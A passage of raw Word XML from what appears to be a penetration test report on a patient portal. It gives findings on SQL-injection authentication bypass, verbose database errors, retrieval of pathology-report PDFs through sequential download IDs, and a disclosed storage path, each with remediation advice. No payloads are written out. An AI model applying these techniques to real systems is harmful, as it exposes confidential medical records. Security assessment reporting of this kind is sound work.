              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="09_Patient_Authentication_Bypass.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3133716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: browser-confirmed portal access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication boundary bypass followed by access to patient reporting functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The observable control failure is that untrusted authentication input can influence database query behavior. The exact application source code was not available in this black-box assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Use parameterized queries/prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>remove string concatenation from authentication queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>use a least-privileged DB account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>implement generic authentication errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>add SQLi regression tests for quote/comment/boolean payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>invalidate sessions after authentication failures and monitor anomalous session creation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Baseline and malicious login inputs must both remain unauthenticated; all malformed inputs must produce a generic failure and no portal redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-04 — Verbose SQL/database error disclosure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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B45309"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-209</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A malformed SQL payload caused the application to return a mysqli_query syntax warning containing database-layer implementation details. The message exposed the database error class and query parsing context. This is separate from F-03 because it represents an error-handling weakness even though it is closely related to the injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Verbose production errors shorten the feedback loop for an attacker by revealing that input reached the database layer and by exposing implementation-specific diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The application returned a mysqli_query syntax warning when supplied malformed SQL syntax. The disclosure confirms that the input reached the database layer and exposes implementation details that should not appear in a production response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2970774"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="22_SQLi_Application_Evidence.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2970774"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: SQL error / application behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Database implementation details disclosed to the remote requester.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The message exposed the database error class and query parsing context. This is separate from F-03 because it represents an error-handling weakness even though it is closely related to the injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Disable display_errors in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>return generic errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>log detailed exceptions server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>protect log files from web access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>add tests that malformed input never reveals database exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Malformed SQL-like input must not disclose database driver, query syntax, stack trace or implementation details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-05 — Sensitive patient-report retrieval following authentication bypass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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FFEDD5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97706"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>After authentication bypass, the patient portal displayed three pathology reports. The HTML exposed download.php?id=1, id=2 and id=3. Each request returned HTTP 200 with application/pdf and the captured files were preserved as evidence. The assessment does not claim a standalone cross-patient IDOR because a separate legitimate-patient-to-other-patient authorization test was not performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The security impact is nevertheless demonstrated: bypassing the patient authentication boundary reaches confidential report objects. The documents were subsequently subjected to offline password recovery, proving that application-level access to the files was the key control point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Portal displayed three pathology-report entries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Download endpoints used sequential identifiers 1, 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>All three requests returned HTTP 200 application/pdf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Retrieved sizes: 3,657 bytes; 3,611 bytes; 3,735 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2988232"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="07_Patient_Portal_Lab_Reports.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2988232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: patient portal and report list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2996047"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="08_Patient_Report_Download_Links.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2996047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: HTML links to download.php?id=1..3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2982413"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="20_Patient_Reports_Listing.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2982413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report listing view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Three confidential pathology-report PDFs were retrieved after the auth bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The HTML exposed download.php?id=1, id=2 and id=3. Each request returned HTTP 200 with application/pdf and the captured files were preserved as evidence. The assessment does not claim a standalone cross-patient IDOR because a separate legitimate-patient-to-other-patient authorization test was not performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Bind each download to the authenticated patient/record owner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>authorize the object server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>use opaque identifiers or short-lived signed URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>log document access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>deny access by default</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>test horizontal authorization separately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authenticated users must receive only records they are authorized to view; unauthorized report IDs must return a consistent denial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-06 — Predictable/disclosed patient-report storage path</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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="DCFCE7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-200 / A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The portal exposed sequential numeric report identifiers and the parent directory disclosed a reports/ storage path. Direct browsing of /patient/reports/ returned HTTP 403, which is positive directory protection, but the path itself remained discoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Predictable identifiers and disclosed storage locations reduce enumeration effort. The practical impact is limited by the observed 403 and should not be overstated as arbitrary file read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The application exposes sequential object identifiers and a storage directory name. This is not treated as proof of arbitrary file read because direct browsing of /patient/reports/ returned 403.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="3002781"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="12_Error_Log_Metadata.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
